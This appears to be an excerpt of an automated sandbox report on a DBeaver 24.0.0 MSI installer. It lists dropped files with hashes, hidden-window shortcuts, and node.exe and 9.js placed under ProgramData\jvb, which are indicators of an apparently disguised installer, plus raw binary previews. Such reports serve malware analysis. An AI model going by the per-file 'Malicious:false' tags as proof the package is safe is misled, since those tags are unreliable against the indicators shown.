      SHA-256:00A0BA035FED540D0BF55350A41BB8AEB029E3C13FE8D413492E93E97BC8DD10
      SHA-512:A9FAC684EA13118D6D631771EB77C56B6FA63EBE5F5364D01C7CEF92EC87720E080EC76490E5F9F199E6EFD74078ACD68AA8AF951EDAC106F1CA28D669C5A655
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,......q......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IhX.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VhX.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VhX.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VhX............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VhX............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............i.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sun Mar 3 16:43:34 2024, mtime=Fri Mar 8 18:08:34 2024, atime=Sun Mar 3 16:43:34 2024, length=532488, window=hide
      Category:dropped
      Size (bytes):2032
      Entropy (8bit):3.618529064561678
      Encrypted:false
      SSDEEP:
      MD5:22A704D8F8715E67B5A54720A37FA8F0
      SHA1:A431CD16F8E0EA453381AAEFE2295AE19C2C81E9
      SHA-256:7C6F54375FEADD9338D646C676AEFEC689BBA09AA45C90101AC624070F7D23D0
      SHA-512:564B4C34F02444ACE07880B3EFCF83A376C52EB972405266A320705987922A9FB5ABEEB25B551C8D99371224B4963A0920B12E6AD887CFCF83538FB10EA144C9
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. .....AP.m.......q....AP.m... ........................:..DG..Yr?.D..U..k0.&...&......&..9....U..q..u....q......t...CFSF..1.....FWtM..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FWtMhX......Y.....................?@.A.p.p.D.a.t.a...B.P.1.....hX....Local.<......FWtMhX.......Z....................4(..L.o.c.a.l.....V.1.....hX#...DBeaver.@......hX..hX#.....@.....................\~..D.B.e.a.v.e.r.....b.2.. ..cXq. .dbeaver.exe.H......cXq.hX......:.........................d.b.e.a.v.e.r...e.x.e.......`...............-......._.............i.....C:\Users\user\AppData\Local\DBeaver\dbeaver.exe..+.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.D.B.e.a.v.e.r.\.d.b.e.a.v.e.r...e.x.e.%.C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.B.e.a.v.e.r...-.n.l. .e.n.1.C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.B.e.a.v.e.r.\.d.b.e.a.v.e.r...e.x.e.........%USERPROFILE%\AppData\Local\DBeaver\dbeaver.exe.......................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Mar 8 18:09:04 2024, mtime=Fri Mar 8 18:09:04 2024, atime=Fri Mar 8 18:09:04 2024, length=374574, window=hide
      Category:dropped
      Size (bytes):2034
      Entropy (8bit):3.6773504475503667
      Encrypted:false
      SSDEEP:
      MD5:7B8497FDD1FC1425A70B4B96EE0C6F5B
      SHA1:FD6F983D24D09D8DAB71B79CF3A257C2DEF385BF
      SHA-256:A64E26EAF01A3B97584547487DF34602FAC23E3E45C4D4A03F94EF03A493E82F
      SHA-512:6CFC63A9249D4109FF52A1A0313F080E10A659B4C8D5F52D8E2A99545D46E8D7412BA0887364256BD735295237FE7240107C8B31D0F31BA981CE123F70575E66
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ....6}..q...d...q...d...q............................:..DG..Yr?.D..U..k0.&...&......&..9....U..q..u....q......t...CFSF..1.....FWtM..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FWtMhX......Y.....................?@.A.p.p.D.a.t.a...B.P.1.....hX....Local.<......FWtMhX.......Z....................4(..L.o.c.a.l.....V.1.....hX#...DBeaver.@......hX..hX#.....@.....................`...D.B.e.a.v.e.r.....h.2.....hX#. .UNINST~1.EXE..L......hX#.hX#.....;.....................cP..U.n.i.n.s.t.a.l.l...e.x.e.......b...............-.......a.............i.....C:\Users\user\AppData\Local\DBeaver\Uninstall.exe..-.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.D.B.e.a.v.e.r.\.U.n.i.n.s.t.a.l.l...e.x.e.%.C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.B.e.a.v.e.r.3.C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.B.e.a.v.e.r.\.U.n.i.n.s.t.a.l.l...e.x.e.........%USERPROFILE%\AppData\Local\DBeaver\Uninstall.exe...................................
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Composite Document File V2 Document, Can't read SAT
      Category:dropped
      Size (bytes):32503
      Entropy (8bit):5.871064585356749
      Encrypted:false
      SSDEEP:
      MD5:94165BAD65E54DF6C0180FB1610C4985
      SHA1:E88D964E4A468870C0043890EAAB5245D0C0C7C7
      SHA-256:2533072252C3D4AE2E288BAC91149A8858646F14E7FC7AB80BE2B32B85B3B744
      SHA-512:C9CB6AAA4DC9C8C16733CC96CC649AD9EB1597DD415943481368F0BADED973374587B7329FD0225456364F4D5DF6B0770263AE749C37C2F379FFE07BA2040CF2
      Malicious:false
      Reputation:unknown
      Preview:......................>...................$................................................................ ...$...(...,...0...4...8...<...@...D...H...L...P...T...X...\...`...d...h...l...p...t...x...|..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install DBeaver Community version 24.0.0, Author: DBeaver Community, Keywords: Installer, Comments: This installer database contains the logic and data required to install DBeaver Community., Template: Intel;1033, Revision Number: {31AF514C-2EE9-44AB-BC1E-F961F608BEC6}, Create Time/Date: Thu Mar 7 16:56:40 2024, Last Saved Time/Date: Thu Mar 7 16:56:40 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
      Category:dropped
      Size (bytes):149209088
      Entropy (8bit):7.999863815077034
      Encrypted:true
      SSDEEP:
      MD5:DE43F5FA3E66CD4F29A1EDD84ECECCAF
      SHA1:3090C1B523C4227EC344B3BF52F6A098CEB31D11
      SHA-256:96629201B43D537E4F2110E4DFAC585C4715AFD4D3433C7F29E6B4B3F22B88D7
      SHA-512:88DD98207CEDABAE072B7E1DB3F9408CFE48590AD6B68BE34812F20E9F19A1F4C1B38058D770741A7DC372BF9088D8E4CED3FBCB2787EE8417F77D1145E63223
      Malicious:false
      Reputation:unknown
      Preview:......................>...................$................................................................ ...$...(...,...0...4...8...<...@...D...H...L...P...T...X...\...`...d...h...l...p...t...x...|..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install DBeaver Community version 24.0.0, Author: DBeaver Community, Keywords: Installer, Comments: This installer database contains the logic and data required to install DBeaver Community., Template: Intel;1033, Revision Number: {31AF514C-2EE9-44AB-BC1E-F961F608BEC6}, Create Time/Date: Thu Mar 7 16:56:40 2024, Last Saved Time/Date: Thu Mar 7 16:56:40 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
      Category:dropped
      Size (bytes):0
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:
      MD5:DE43F5FA3E66CD4F29A1EDD84ECECCAF
      SHA1:3090C1B523C4227EC344B3BF52F6A098CEB31D11
      SHA-256:96629201B43D537E4F2110E4DFAC585C4715AFD4D3433C7F29E6B4B3F22B88D7
      SHA-512:88DD98207CEDABAE072B7E1DB3F9408CFE48590AD6B68BE34812F20E9F19A1F4C1B38058D770741A7DC372BF9088D8E4CED3FBCB2787EE8417F77D1145E63223
      Malicious:false
      Reputation:unknown
      Preview:......................>...................$................................................................ ...$...(...,...0...4...8...<...@...D...H...L...P...T...X...\...`...d...h...l...p...t...x...|..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\msiexec.exe
      File Type:data
      Category:dropped
      Size (bytes):3397
      Entropy (8bit):5.649331899619524
      Encrypted:false
      SSDEEP:
      MD5:59EA85139B1C4A636CE8A55EFE5C70CB
      SHA1:2E4415581898924BB3809A20085A739634D63BCD
      SHA-256:9EB4FE732FF296540D3ED27F85DB2C7691B680D3BCF54CC921DF32DEDBA7BF26
      SHA-512:5382E5192EF33357CFECE283F400923A26E30BF3A2B5F3B0136B0B84B7F51C4104AA7C8B477D717B95B4B10D84070901AD9CD566F41CFDD7AE36CCD7DE8C5C1E
      Malicious:false
      Reputation:unknown
      Preview:...@IXOS.@.....@..hX.@.....@.....@.....@.....@.....@......&.{575F8743-E380-426E-B41E-B72C0697E25F}..DBeaver Community".dbeaver-ce-24.0.0-x86_64-setup.msi.@.....@.....@.....@........&.{31AF514C-2EE9-44AB-BC1E-F961F608BEC6}.....@.....@.....@.....@.......@.....@.....@.......@......DBeaver Community......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{575F8743-E380-426E-B41E-B72C44E41CE0}..C:\ProgramData\.@.......@.....@.....@......&.{575F8743-E380-426E-B41E-B72CB9C24E82}..C:\ProgramData\jvb\.@.......@.....@.....@......&.{575F8743-E380-426E-B41E-B72C723ED936}..C:\ProgramData\jvb\dbeaver.exe.@.......@.....@.....@......&.{575F8743-E380-426E-B41E-B72CF46DAD7A}..C:\ProgramData\jvb\9.js.@.......@.....@.....@......&.{575F8743-E380-426E-B41E-B72CDCA22E3C}..C:\ProgramData\jvb\node.exe.@.......@.....@.....@......&.{575F8743-E380-426E-B41E-B72C39182E33}..C:\ProgramDa
      Process:C:\Windows\System32\msiexec.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):403156
      Entropy (8bit):5.359644762137181
      Encrypted:false
      SSDEEP:
      MD5:929C948EB4F175A70B0B8711A2634066
      SHA1:F80D38F743C581ADAEDC72133BA27620A70B4700
      SHA-256:31BB97E64E9AF21305282046980C43ED9FB8F84924FFB73F1E7AD3B1EBF4EDDD
      SHA-512:9C4AAEDACB2DE604D9D189512807BA5E4812C67AECC4B888388DEE8DCB0584D61A41795A1A2ADE43FDE9D74CA8963BD4B4939040E24E106E257E29BC12E01D35
      Malicious:false
      Reputation:unknown
      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
      No static file info